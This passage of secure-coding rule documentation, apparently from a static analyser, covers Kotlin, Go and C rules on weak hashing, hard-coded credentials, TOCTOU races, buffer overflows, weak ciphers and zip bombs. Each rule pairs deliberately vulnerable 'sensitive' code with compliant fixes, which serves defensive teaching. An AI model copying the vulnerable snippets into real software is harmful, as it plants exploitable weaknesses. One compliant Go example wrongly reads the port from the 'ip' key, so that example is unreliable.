    Response response = client.newCall(request).execute()
}

How does this work?

To fix the vulnerability of disabled hostname validation, it is strongly recommended to first re-enable the default validation and fix the root cause: the validity of the certificate.

Use valid certificates

If a hostname validation failure prevents connecting to the target server, keep in mind that one system’s code should not work around another system’s problems, as this creates unnecessary dependencies and can lead to reliability issues.

Therefore, the first solution is to change the remote host’s certificate to match its identity. If the remote host is not under your control, consider replicating its service to a server whose certificate you can change yourself.

In case the contacted host is located on a development machine, and if there is no other choice, try following this solution:

  • Create a self-signed certificate for that machine.
  • Add this self-signed certificate to the system’s trust store.
  • If the hostname is not localhost, add the hostname in the /etc/hosts file.

Here is a sample command to import a certificate to the Java trust store:

keytool -import -alias myserver -file myserver.crt -keystore cacerts

Resources

Standards

kotlin:S6291

Storing data locally is a common task for mobile applications. Such data includes preferences or authentication tokens for external services, among other things. There are many convenient solutions that allow storing data persistently, for example SQLiteDatabase, SharedPreferences, and Realm. By default these systems store the data unencrypted, thus an attacker with physical access to the device can read them out easily. Access to sensitive data can be harmful for the user of the application, for example when the device gets stolen.

Ask Yourself Whether

  • The database contains sensitive data that could cause harm when leaked.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to password-encrypt local databases that contain sensitive information. Most systems provide secure alternatives to plain-text storage that should be used. If no secure alternative is available the data can also be encrypted manually before it is stored.

The encryption password should not be hard-coded in the application. There are different approaches how the password can be provided to encrypt and decrypt the database. In the case of EncryptedSharedPreferences the Android Keystore can be used to store the password. Other databases can rely on EncryptedSharedPreferences to store passwords. The password can also be provided dynamically by the user of the application or it can be fetched from a remote server if the other methods are not feasible.

Sensitive Code Example

For SQLiteDatabase:

var db = activity.openOrCreateDatabase("test.db", Context.MODE_PRIVATE, null) // Sensitive

For SharedPreferences:

val pref = activity.getPreferences(Context.MODE_PRIVATE) // Sensitive

For Realm:

val config = RealmConfiguration.Builder().build()
val realm = Realm.getInstance(config) // Sensitive

Compliant Solution

Instead of SQLiteDatabase you can use SQLCipher:

val db = SQLiteDatabase.openOrCreateDatabase("test.db", getKey(), null)

Instead of SharedPreferences you can use EncryptedSharedPreferences:

val masterKeyAlias = MasterKeys.getOrCreate(MasterKeys.AES256_GCM_SPEC)
EncryptedSharedPreferences.create(
    "secret",
    masterKeyAlias,
    context,
    EncryptedSharedPreferences.PrefKeyEncryptionScheme.AES256_SIV,
    EncryptedSharedPreferences.PrefValueEncryptionScheme.AES256_GCM
)

For Realm an encryption key can be specified in the config:

val config = RealmConfiguration.Builder()
    .encryptionKey(getKey())
    .build()
val realm = Realm.getInstance(config)

See

kotlin:S4790

The MD5 algorithm and its successor, SHA-1, are no longer considered secure, because it is too easy to create hash collisions with them. That is, it takes too little computational effort to come up with a different input that produces the same MD5 or SHA-1 hash, and using the new, same-hash value gives an attacker the same access as if he had the originally-hashed value. This applies as well to the other Message-Digest algorithms: MD2, MD4, MD6, HAVAL-128, HMAC-MD5, DSA (which uses SHA-1), RIPEMD, RIPEMD-128, RIPEMD-160, HMACRIPEMD160.

The following APIs are tracked for use of obsolete crypto algorithms:

  • java.security.AlgorithmParameters (JDK)
  • java.security.AlgorithmParameterGenerator (JDK)
  • java.security.MessageDigest (JDK)
  • java.security.KeyFactory (JDK)
  • java.security.KeyPairGenerator (JDK)
  • java.security.Signature (JDK)
  • javax.crypto.Mac (JDK)
  • javax.crypto.KeyGenerator (JDK)
  • org.apache.commons.codec.digest.DigestUtils (Apache Commons Codec)
  • org.springframework.util.DigestUtils
  • com.google.common.hash.Hashing (Guava)
  • org.springframework.security.authentication.encoding.ShaPasswordEncoder (Spring Security 4.2.x)
  • org.springframework.security.authentication.encoding.Md5PasswordEncoder (Spring Security 4.2.x)
  • org.springframework.security.crypto.password.LdapShaPasswordEncoder (Spring Security 5.0.x)
  • org.springframework.security.crypto.password.Md4PasswordEncoder (Spring Security 5.0.x)
  • org.springframework.security.crypto.password.MessageDigestPasswordEncoder (Spring Security 5.0.x)
  • org.springframework.security.crypto.password.NoOpPasswordEncoder (Spring Security 5.0.x)
  • org.springframework.security.crypto.password.StandardPasswordEncoder (Spring Security 5.0.x)

Ask Yourself Whether

The hashed value is used in a security context like:

  • User-password storage.
  • Security token generation (used to confirm e-mail when registering on a website, reset password, etc …​).
  • To compute some message integrity.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Safer alternatives, such as SHA-256, SHA-512, SHA-3 are recommended, and for password hashing, it’s even better to use algorithms that do not compute too "quickly", like bcrypt, scrypt, argon2 or pbkdf2 because it slows down brute force attacks.

Sensitive Code Example

val md1: MessageDigest = MessageDigest.getInstance("SHA");  // Sensitive:  SHA is not a standard name, for most security providers it's an alias of SHA-1
val md2: MessageDigest = MessageDigest.getInstance("SHA1");  // Sensitive

Compliant Solution

val md1: MessageDigest = MessageDigest.getInstance("SHA-512"); // Compliant

See

kotlin:S6293

Android comes with Android KeyStore, a secure container for storing key materials. It’s possible to define certain keys to be unlocked when users authenticate using biometric credentials. This way, even if the application process is compromised, the attacker cannot access keys, as presence of the authorized user is required.

These keys can be used, to encrypt, sign or create a message authentication code (MAC) as proof that the authentication result has not been tampered with. This protection defeats the scenario where an attacker with physical access to the device would try to hook into the application process and call the onAuthenticationSucceeded method directly. Therefore he would be unable to extract the sensitive data or to perform the critical operations protected by the biometric authentication.

Ask Yourself Whether

The application contains:

  • Cryptographic keys / sensitive information that need to be protected using biometric authentication.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

It’s recommended to tie the biometric authentication to a cryptographic operation by using a CryptoObject during authentication.

Sensitive Code Example

A CryptoObjectis not used during authentication:

// ...
val biometricPrompt: BiometricPrompt = BiometricPrompt(activity, executor, callback)
// ...
biometricPrompt.authenticate(promptInfo) // Noncompliant

Compliant Solution

A CryptoObject is used during authentication:

// ...
val biometricPrompt: BiometricPrompt = BiometricPrompt(activity, executor, callback)
// ...
biometricPrompt.authenticate(promptInfo, BiometricPrompt.CryptoObject(cipher)) // Compliant

See

go:S1313

Hardcoding IP addresses is security-sensitive. It has led in the past to the following vulnerabilities:

Today’s services have an ever-changing architecture due to their scaling and redundancy needs. It is a mistake to think that a service will always have the same IP address. When it does change, the hardcoded IP will have to be modified too. This will have an impact on the product development, delivery, and deployment:

  • The developers will have to do a rapid fix every time this happens, instead of having an operation team change a configuration file.
  • It misleads to use the same address in every environment (dev, sys, qa, prod).

Last but not least it has an effect on application security. Attackers might be able to decompile the code and thereby discover a potentially sensitive address. They can perform a Denial of Service attack on the service, try to get access to the system, or try to spoof the IP address to bypass security checks. Such attacks can always be possible, but in the case of a hardcoded IP address solving the issue will take more time, which will increase an attack’s impact.

Ask Yourself Whether

The disclosed IP address is sensitive, e.g.:

  • Can give information to an attacker about the network topology.
  • It’s a personal (assigned to an identifiable person) IP address.

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

Don’t hard-code the IP address in the source code, instead make it configurable with environment variables, configuration files, or a similar approach. Alternatively, if confidentially is not required a domain name can be used since it allows to change the destination quickly without having to rebuild the software.

Sensitive Code Example

var (
  ip   = "192.168.12.42"
  port = 3333
)

SocketClient(ip, port)

Compliant Solution

config, err := ReadConfig("properties.ini")

ip := config["ip"]
port := config["ip"]

SocketClient(ip, port)

Exceptions

No issue is reported for the following cases because they are not considered sensitive:

  • Loopback addresses 127.0.0.0/8 in CIDR notation (from 127.0.0.0 to 127.255.255.255)
  • Broadcast address 255.255.255.255
  • Non-routable address 0.0.0.0
  • Strings of the form 2.5.<number>.<number> as they often match Object Identifiers (OID)
  • Addresses in the ranges 192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24, reserved for documentation purposes by RFC 5737
  • Addresses in the range 2001:db8::/32, reserved for documentation purposes by RFC 3849

See

go:S2068

Because it is easy to extract strings from an application source code or binary, credentials should not be hard-coded. This is particularly true for applications that are distributed or that are open-source.

In the past, it has led to the following vulnerabilities:

Credentials should be stored outside of the code in a configuration file, a database, or a management service for secrets.

This rule flags instances of hard-coded credentials used in database and LDAP connections. It looks for hard-coded credentials in connection strings, and for variable names that match any of the patterns from the provided list.

It’s recommended to customize the configuration of this rule with additional credential words such as "oauthToken", "secret", …​

Ask Yourself Whether

  • Credentials allow access to a sensitive component like a database, a file storage, an API or a service.
  • Credentials are used in production environments.
  • Application re-distribution is required before updating the credentials.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Store the credentials in a configuration file that is not pushed to the code repository.
  • Store the credentials in a database.
  • Use your cloud provider’s service for managing secrets.
  • If a password has been disclosed through the source code: change it.

Sensitive Code Example

func connect()  {
  user := "root"
  password:= "supersecret" // Sensitive

  url := "login=" + user + "&passwd=" + password
}

Compliant Solution

func connect()  {
  user := getEncryptedUser()
  password:= getEncryptedPass() // Compliant

  url := "login=" + user + "&passwd=" + password
}

See

c:S5982

The purpose of changing the current working directory is to modify the base path when the process performs relative path resolutions. When the working directory cannot be changed, the process keeps the directory previously defined as the active working directory. Thus, verifying the success of chdir() type of functions is important to prevent unintended relative paths and unauthorized access.

Ask Yourself Whether

  • The success of changing the working directory is relevant for the application.
  • Changing the working directory is required by chroot to make the new root effective.
  • Subsequent disk operations are using relative paths.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

After changing the current working directory verify the success of the operation and handle errors.

Sensitive Code Example

The chdir operation could fail and the process still has access to unauthorized resources. The return code should be verified:

const char* any_dir = "/any/";
chdir(any_dir); // Sensitive: missing check of the return value

int fd = open(any_dir, O_RDONLY | O_DIRECTORY);
fchdir(fd); // Sensitive: missing check of the return value

Compliant Solution

Verify the return code of chdir and handle errors:

const char* root_dir = "/jail/";
if (chdir(root_dir) == -1) {
  exit(-1);
} // Compliant

int fd = open(any_dir, O_RDONLY | O_DIRECTORY);
if(fchdir(fd) == -1) {
  exit(-1);
} // Compliant

See

c:S5832

Why is this an issue?

Pluggable authentication module (PAM) is a mechanism used on many unix variants to provide a unified way to authenticate users, independently of the underlying authentication scheme.

When authenticating users, it is strongly recommended to check the validity of the account (not locked, not expired …​), otherwise it leads to unauthorized access to resources.

Noncompliant code example

The account validity is not checked with pam_acct_mgmt when authenticating a user with pam_authenticate:

int valid(pam_handle_t *pamh) {
    if (pam_authenticate(pamh, PAM_DISALLOW_NULL_AUTHTOK) != PAM_SUCCESS) { // Noncompliant - missing pam_acct_mgmt
        return -1;
    }

    return 0;
}

The return value of pam_acct_mgmt is not checked:

int valid(pam_handle_t *pamh) {
    if (pam_authenticate(pamh, PAM_DISALLOW_NULL_AUTHTOK) != PAM_SUCCESS) {
        return -1;
    }
    pam_acct_mgmt(pamh, 0); // Noncompliant
    return 0;
}

Compliant solution

When authenticating a user with pam_authenticate, check the account validity with pam_acct_mgmt:

int valid(pam_handle_t *pamh) {
    if (pam_authenticate(pamh, PAM_DISALLOW_NULL_AUTHTOK) != PAM_SUCCESS) {
        return -1;
    }
    if (pam_acct_mgmt(pamh, 0) != PAM_SUCCESS) { // Compliant
        return -1;
    }
    return 0;
}

Resources

c:S5847

Why is this an issue?

"Time Of Check to Time Of Use" (TOCTOU) vulnerabilities occur when an application:

  • First, checks permissions or attributes of a file: for instance, is a file a symbolic link?
  • Next, performs some operations such as writing data to this file.

The application cannot assume the state of the file is unchanged between these two steps, there is a race condition (ie: two different processes can access and modify the same shared object/file at the same time, which can lead to privilege escalation, denial of service and other unexpected results).

For instance, attackers can benefit from this situation by creating a symbolic link to a sensitive file directly after the first step (eg in Unix: /etc/passwd) and try to elevate their privileges (eg: if the written data has the correct /etc/passwd file format).

To avoid TOCTOU vulnerabilities, one possible solution is to do a single atomic operation for the "check" and "use" actions, therefore removing the race condition window. Another possibility is to use file descriptors. This way the binding of the file descriptor to the file cannot be changed by a concurrent process.

Noncompliant code example

A "check function" (for instance access, stat …​ in this case access to verify the existence of a file) is used, followed by a "use function" (open, fopen …​) to write data inside a non existing file. These two consecutive calls create a TOCTOU race condition:

#include <stdio.h>

void fopen_with_toctou(const char *file) {
  if (access(file, F_OK) == -1 && errno == ENOENT) {
    // the file doesn't exist
    // it is now created in order to write some data inside
    FILE *f = fopen(file, "w"); // Noncompliant: a race condition window exist from access() call to fopen() call calls
    if (NULL == f) {
      /* Handle error */
    }

    if (fclose(f) == EOF) {
      /* Handle error */
    }
  }
}

Compliant solution

If the file already exists on the disk, fopen with x mode will fail:

#include <stdio.h>

void open_without_toctou(const char *file) {
  FILE *f = fopen(file, "wx"); // Compliant
  if (NULL == f) {
    /* Handle error */
  }
  /* Write to file */
  if (fclose(f) == EOF) {
    /* Handle error */
  }
}

A more generic solution is to use "file descriptors":

void open_without_toctou(const char *file) {
  int fd = open(file, O_CREAT | O_EXCL | O_WRONLY);
  if (-1 != fd) {
    FILE *f = fdopen(fd, "w");  // Compliant
  }
}

Resources

c:S5849

Setting capabilities can lead to privilege escalation.

Linux capabilities allow you to assign narrow slices of root's permissions to files or processes. A thread with capabilities bypasses the normal kernel security checks to execute high-privilege actions such as mounting a device to a directory, without requiring (additional) root privileges.

Ask Yourself Whether

Capabilities are granted:

  • To a process that does not require all capabilities to do its job.
  • To a not trusted process.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Capabilities are high privileges, traditionally associated with superuser (root), thus make sure that the most restrictive and necessary capabilities are assigned to files and processes.

Sensitive Code Example

When setting capabilities:

cap_t caps = cap_init();
cap_value_t cap_list[2];
cap_list[0] = CAP_FOWNER;
cap_list[1] = CAP_CHOWN;
cap_set_flag(caps, CAP_PERMITTED, 2, cap_list, CAP_SET);

cap_set_file("file", caps); // Sensitive
cap_set_fd(fd, caps); // Sensitive
cap_set_proc(caps); // Sensitive
capsetp(pid, caps); // Sensitive
capset(hdrp, datap); // Sensitive: is discouraged to be used because it is a system call

When setting SUID/SGID attributes:

chmod("file", S_ISUID|S_ISGID); // Sensitive
fchmod(fd, S_ISUID|S_ISGID); // Sensitive

See

c:S5042

Successful Zip Bomb attacks occur when an application expands untrusted archive files without controlling the size of the expanded data, which can lead to denial of service. A Zip bomb is usually a malicious archive file of a few kilobytes of compressed data but turned into gigabytes of uncompressed data. To achieve this extreme compression ratio, attackers will compress irrelevant data (eg: a long string of repeated bytes).

Ask Yourself Whether

Archives to expand are untrusted and:

  • There is no validation of the number of entries in the archive.
  • There is no validation of the total size of the uncompressed data.
  • There is no validation of the ratio between the compressed and uncompressed archive entry.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Define and control the threshold for maximum total size of the uncompressed data.
  • Count the number of file entries extracted from the archive and abort the extraction if their number is greater than a predefined threshold, in particular it’s not recommended to recursively expand archives (an entry of an archive could be also an archive).

Sensitive Code Example

#include <archive.h>
#include <archive_entry.h>
// ...

void f(const char *filename, int flags) {
  struct archive_entry *entry;
  struct archive *a = archive_read_new();
  struct archive *ext = archive_write_disk_new();
  archive_write_disk_set_options(ext, flags);
  archive_read_support_format_tar(a);

  if ((archive_read_open_filename(a, filename, 10240))) {
    return;
  }

  for (;;) {
    int r = archive_read_next_header(a, &entry);
    if (r == ARCHIVE_EOF) {
      break;
    }
    if (r != ARCHIVE_OK) {
      return;
    }
  }
  archive_read_close(a);
  archive_read_free(a);

  archive_write_close(ext);
  archive_write_free(ext);
}

Compliant Solution

#include <archive.h>
#include <archive_entry.h>
// ...

int f(const char *filename, int flags) {
  const int max_number_of_extraced_entries = 1000;
  const int64_t max_file_size = 1000000000; // 1 GB

  int number_of_extraced_entries = 0;
  int64_t total_file_size = 0;

  struct archive_entry *entry;
  struct archive *a = archive_read_new();
  struct archive *ext = archive_write_disk_new();
  archive_write_disk_set_options(ext, flags);
  archive_read_support_format_tar(a);
  int status = 0;

  if ((archive_read_open_filename(a, filename, 10240))) {
    return -1;
  }

  for (;;) {
    number_of_extraced_entries++;
    if (number_of_extraced_entries > max_number_of_extraced_entries) {
      status = 1;
      break;
    }

    int r = archive_read_next_header(a, &entry);
    if (r == ARCHIVE_EOF) {
      break;
    }
    if (r != ARCHIVE_OK) {
      status = -1;
      break;
    }

    int file_size = archive_entry_size(entry);
    total_file_size += file_size;
    if (total_file_size > max_file_size) {
      status = 1;
      break;
    }
  }
  archive_read_close(a);
  archive_read_free(a);

  archive_write_close(ext);
  archive_write_free(ext);

  return status;
}

See

c:S6069

When using sprintf , it’s up to the developer to make sure the size of the buffer to be written to is large enough to avoid buffer overflows. Buffer overflows can cause the program to crash at a minimum. At worst, a carefully crafted overflow can cause malicious code to be executed.

Ask Yourself Whether

  • if the provided buffer is large enough for the result of any possible call to the sprintf function (including all possible format strings and all possible additional arguments).

There is a risk if you answered no to the above question.

Recommended Secure Coding Practices

There are fundamentally safer alternatives. snprintf is one of them. It takes the size of the buffer as an additional argument, preventing the function from overflowing the buffer.

  • Use snprintf instead of sprintf. The slight performance overhead can be afforded in a vast majority of projects.
  • Check the buffer size passed to snprintf.

If you are working in C++, other safe alternative exist:

  • std::string should be the prefered type to store strings
  • You can format to a string using std::ostringstream
  • Since C++20, std::format is also available to format strings

Sensitive Code Example

sprintf(str, "%s", message);   // Sensitive: `str` buffer size is not checked and it is vulnerable to overflows

Compliant Solution

snprintf(str, sizeof(str), "%s", message); // Prevent overflows by enforcing a maximum size for `str` buffer

Exceptions

It is a very common and acceptable pattern to compute the required size of the buffer with a call to snprintf with the same arguments into an empty buffer (this will fail, but return the necessary size), then to call sprintf as the bound check is not needed anymore. Note that 1 needs to be added by the size reported by snprintf to account for the terminal null character.

size_t buflen = snprintf(0, 0, "%s", message);
char* buf = malloc(buflen + 1); // For the final 0
sprintf(buf, "%s", message);{code}

See

c:S5547

This vulnerability makes it possible that the cleartext of the encrypted message might be recoverable without prior knowledge of the key.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communication in various domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection.
  • Security during transmission or on storage devices.
  • Data integrity, general trust, and authentication.

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

What is the potential impact?

The cleartext of an encrypted message might be recoverable. Additionally, it might be possible to modify the cleartext of an encrypted message.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Theft of sensitive data

The encrypted message might contain data that is considered sensitive and should not be known to third parties.

By using a weak algorithm the likelihood that an attacker might be able to recover the cleartext drastically increases.

Additional attack surface

By modifying the cleartext of the encrypted message it might be possible for an attacker to trigger other vulnerabilities in the code. Encrypted values are often considered trusted, since under normal circumstances it would not be possible for a third party to modify them.

How to fix it in Botan

Code examples

The following code contains examples of algorithms that are not considered highly resistant to cryptanalysis and thus should be avoided.

Noncompliant code example

#include <botan/cipher_mode.h>

void encrypt() {
  Botan::Cipher_Mode::create("DES/CBC/PKCS7", Botan::ENCRYPTION); // Noncompliant
}

Compliant solution

#include <botan/cipher_mode.h>

void encrypt() {
  Botan::Cipher_Mode::create("AES-256/GCM", Botan::ENCRYPTION);
}

How does this work?

Use a secure algorithm

It is highly recommended to use an algorithm that is currently considered secure by the cryptographic community. A common choice for such an algorithm is the Advanced Encryption Standard (AES).

For block ciphers, it is not recommended to use algorithms with a block size that is smaller than 128 bits.

Resources

Documentation

Standards

c:S5542

This vulnerability exposes encrypted data to a number of attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

For AES, the weakest modes are CBC (Cipher Block Chaining) and ECB

(Electronic Codebook), as they are either vulnerable to padding oracles or do not provide authentication mechanisms.

And for RSA, the weakest algorithms are either using it without padding or using the PKCS1v1.5 padding scheme.

What is the potential impact?

The cleartext of an encrypted message might be recoverable. Additionally, it might be possible to modify the cleartext of an encrypted message.

Below are some real-world scenarios that illustrate possible impacts of an attacker exploiting the vulnerability.

Theft of sensitive data

The encrypted message might contain data that is considered sensitive and should not be known to third parties.

By using a weak algorithm the likelihood that an attacker might be able to recover the cleartext drastically increases.

Additional attack surface

By modifying the cleartext of the encrypted message it might be possible for an attacker to trigger other vulnerabilities in the code. Encrypted values are often considered trusted, since under normal circumstances it would not be possible for a third party to modify them.

How to fix it in Botan

Code examples

Noncompliant code example

Example with a symmetric cipher, AES:

#include <botan/cipher_mode.h>

void encrypt() {
  Botan::Cipher_Mode::create("AES-256/ECB", Botan::ENCRYPTION); // Noncompliant
}

Example with an asymmetric cipher, RSA:

#include <botan/rng.h>
#include <botan/auto_rng.h>
#include <botan/rsa.h>
#include <botan/pubkey.h>

void encrypt() {
  std::unique_ptr<Botan::RandomNumberGenerator>   rng(new Botan::AutoSeeded_RNG);
  Botan::RSA_PrivateKey                           rsaKey(*rng.get(), 2048);

  Botan::PK_Encryptor_EME(rsaKey, *rng.get(), "PKCS1v15"); // Noncompliant
}

Compliant solution

For the AES symmetric cipher, use the GCM mode:

#include <botan/cipher_mode.h>

void encrypt() {
  Botan::Cipher_Mode::create("AES-256/GCM", Botan::ENCRYPTION);
}

For the RSA asymmetric cipher, use the Optimal Asymmetric Encryption Padding (OAEP):

#include <botan/rng.h>
#include <botan/auto_rng.h>
#include <botan/rsa.h>
#include <botan/pubkey.h>

void encrypt() {
  std::unique_ptr<Botan::RandomNumberGenerator>   rng(new Botan::AutoSeeded_RNG);
  Botan::RSA_PrivateKey                           rsaKey(*rng.get(), 2048);

  Botan::PK_Encryptor_EME(rsaKey, *rng.get(), "OAEP");
}

How does this work?

As a rule of thumb, use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

Appropriate choices are currently the following.

For AES: Use Galois/Counter mode (GCM)

GCM mode combines encryption with authentication and integrity checks using a cryptographic hash function and provides both confidentiality and authenticity of data.

Other similar modes are:

  • CCM: Counter with CBC-MAC
  • CWC: Cipher Block Chaining with Message Authentication Code
  • EAX: Encrypt-and-Authenticate
  • IAPM: Integer Authenticated Parallelizable Mode
  • OCB: Offset Codebook Mode

It is also possible to use AES-CBC with HMAC for integrity checks. However, it

is considered more straightforward to use AES-GCM directly instead.

For RSA: use the OAEP scheme

The Optimal Asymmetric Encryption Padding scheme (OAEP) adds randomness and a secure hash function that strengthens the regular inner workings of RSA.

Resources

Articles & blog posts

Standards

c:S5782

Why is this an issue?

Array overruns and buffer overflows happen when memory access accidentally goes beyond the boundary of the allocated array or buffer. These overreaching accesses cause some of the most damaging, and hard to track defects.

When the buffer overflow happens while reading a buffer, it can expose sensitive data that happens to be located next to the buffer in memory. When it happens while writing a buffer, it can be used to inject code or to wipe out sensitive memory.

This rule detects when a POSIX function takes one argument that is a buffer and another one that represents the size of the buffer, but the two arguments do not match.

Noncompliant code example

char array[10];
initialize(array);
void *pos = memchr(array, '@', 42); // Noncompliant, buffer overflow that could expose sensitive data

Compliant solution

char array[10];
initialize(array);
void *pos = memchr(array, '@', 10);

Exceptions

Functions related to sockets using the type socklen_t are not checked. This is because these functions are using a C-style polymorphic pattern using union. It relies on a mismatch between allocated memory and sizes of structures and it creates false positives.

Resources

c:S4423

This vulnerability exposes encrypted data to a number of attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

To provide communication security over a network, SSL and TLS are generally used. However, it is important to note that the following protocols are all considered weak by the cryptographic community, and are officially deprecated:

  • SSL versions 1.0, 2.0 and 3.0
  • TLS versions 1.0 and 1.1

When these unsecured protocols are used, it is best practice to expect a breach: that a user or organization with malicious intent will perform mathematical attacks on this data after obtaining it by other means.

What is the potential impact?

After retrieving encrypted data and performing cryptographic attacks on it on a given timeframe, attackers can recover the plaintext that encryption was supposed to protect.

Depending on the recovered data, the impact may vary.

Below are some real-world scenarios that illustrate the potential impact of an attacker exploiting the vulnerability.

Additional attack surface

By modifying the plaintext of the encrypted message, an attacker may be able to trigger additional vulnerabilities in the code. An attacker can further exploit a system to obtain more information.
Encrypted values are often considered trustworthy because it would not be possible for a third party to modify them under normal circumstances.

Breach of confidentiality and privacy

When encrypted data contains personal or sensitive information, its retrieval by an attacker can lead to privacy violations, identity theft, financial loss, reputational damage, or unauthorized access to confidential systems.

In this scenario, the company, its employees, users, and partners could be seriously affected.

The impact is twofold, as data breaches and exposure of encrypted data can undermine trust in the organization, as customers, clients and stakeholders may lose confidence in the organization’s ability to protect their sensitive data.

Legal and compliance issues

In many industries and locations, there are legal and compliance requirements to protect sensitive data. If encrypted data is compromised and the plaintext can be recovered, companies face legal consequences, penalties, or violations of privacy laws.

How to fix it in cURL

Code examples

The following code samples attempt to create an HTTP request.

Noncompliant code example

This sample uses Curl’s default TLS algorithms, which are weak cryptographical algorithms: TLSv1.0 and LTSv1.1.

#include <curl/curl.h>

void encrypt() {
    CURL *curl;
    curl_global_init(CURL_GLOBAL_DEFAULT);

    curl = curl_easy_init();                                      // Noncompliant
    curl_easy_setopt(curl, CURLOPT_URL, "https://example.com/");

    curl_easy_perform(curl);
}

Compliant solution

#include <curl/curl.h>

void encrypt() {
    CURL *curl;
    curl_global_init(CURL_GLOBAL_DEFAULT);

    curl = curl_easy_init();
    curl_easy_setopt(curl, CURLOPT_URL, "https://example.com/");
    curl_easy_setopt(curl, CURLOPT_SSLVERSION, CURL_SSLVERSION_TLSv1_2);

    curl_easy_perform(curl);
}

How does this work?

As a rule of thumb, by default you should use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

The best choices at the moment are the following.

Use TLS v1.2 or TLS v1.3

Even though TLS V1.3 is available, using TLS v1.2 is still considered good and secure practice by the cryptography community.

The use of TLS v1.2 ensures compatibility with a wide range of platforms and enables seamless communication between different systems that do not yet have TLS v1.3 support.

The only drawback depends on whether the framework used is outdated: its TLS v1.2 settings may enable older and insecure cipher suites that are deprecated as insecure.

On the other hand, TLS v1.3 removes support for older and weaker cryptographic algorithms, eliminates known vulnerabilities from previous TLS versions, and improves performance.

Resources

Articles & blog posts

Standards

c:S4426

This vulnerability exposes encrypted data to attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

In today’s cryptography, the length of the key directly affects the security level of cryptographic algorithms.

Note that depending on the algorithm, the term key refers to a different mathematical property. For example:

  • For RSA, the key is the product of two large prime numbers, also called the modulus.
  • For AES and Elliptic Curve Cryptography (ECC), the key is only a sequence of randomly generated bytes.
    • In some cases, AES keys are derived from a master key or a passphrase using a Key Derivation Function (KDF) like PBKDF2 (Password-Based Key Derivation Function 2)

If an application uses a key that is considered short and insecure, the encrypted data is exposed to attacks aimed at getting at the plaintext.

In general, it is best practice to expect a breach: that a user or organization with malicious intent will perform cryptographic attacks on this data after obtaining it by other means.

What is the potential impact?

After retrieving encrypted data and performing cryptographic attacks on it on a given timeframe, attackers can recover the plaintext that encryption was supposed to protect.

Depending on the recovered data, the impact may vary.

Below are some real-world scenarios that illustrate the potential impact of an attacker exploiting the vulnerability.

Additional attack surface

By modifying the plaintext of the encrypted message, an attacker may be able to trigger additional vulnerabilities in the code. An attacker can further exploit a system to obtain more information.
Encrypted values are often considered trustworthy because it would not be possible for a third party to modify them under normal circumstances.

Breach of confidentiality and privacy

When encrypted data contains personal or sensitive information, its retrieval by an attacker can lead to privacy violations, identity theft, financial loss, reputational damage, or unauthorized access to confidential systems.

In this scenario, the company, its employees, users, and partners could be seriously affected.

The impact is twofold, as data breaches and exposure of encrypted data can undermine trust in the organization, as customers, clients and stakeholders may lose confidence in the organization’s ability to protect their sensitive data.

Legal and compliance issues

In many industries and locations, there are legal and compliance requirements to protect sensitive data. If encrypted data is compromised and the plaintext can be recovered, companies face legal consequences, penalties, or violations of privacy laws.

How to fix it in Botan

Code examples

The following code examples either explicitly or implicitly generate keys. Note that there are differences in the size of the keys depending on the algorithm.

Due to the mathematical properties of the algorithms, the security requirements for the key size vary depending on the algorithm.
For example, a 256-bit ECC key provides about the same level of security as a 3072-bit RSA key and a 128-bit symmetric key.

Noncompliant code example

Here is an example of a private key generation with RSA:

#include <botan/pubkey.h>
#include <botan/rng.h>
#include <botan/rsa.h>

void encrypt() {
    std::unique_ptr<Botan::RandomNumberGenerator>   rng(new Botan::System_RNG);
    Botan::RSA_PrivateKey                           rsaKey(*rng, 1024); // Noncompliant
}

Here is an example with the generation of a key as part of a Discrete Logarithmic (DL) group, a Digital Signature Algorithm (DSA) parameter:

#include <botan/dl_group.h>

void encrypt() {
    Botan::DL_Group("dsa/botan/1024"); // Noncompliant
}

Here is an example of an Elliptic Curve (EC) initialization. It implicitly generates a private key whose size is indicated in the algorithm name:

#include <botan/ec_group.h>

void encrypt() {
    Botan::EC_Group("secp160k1"); // Noncompliant
}

Compliant solution

#include <botan/pubkey.h>
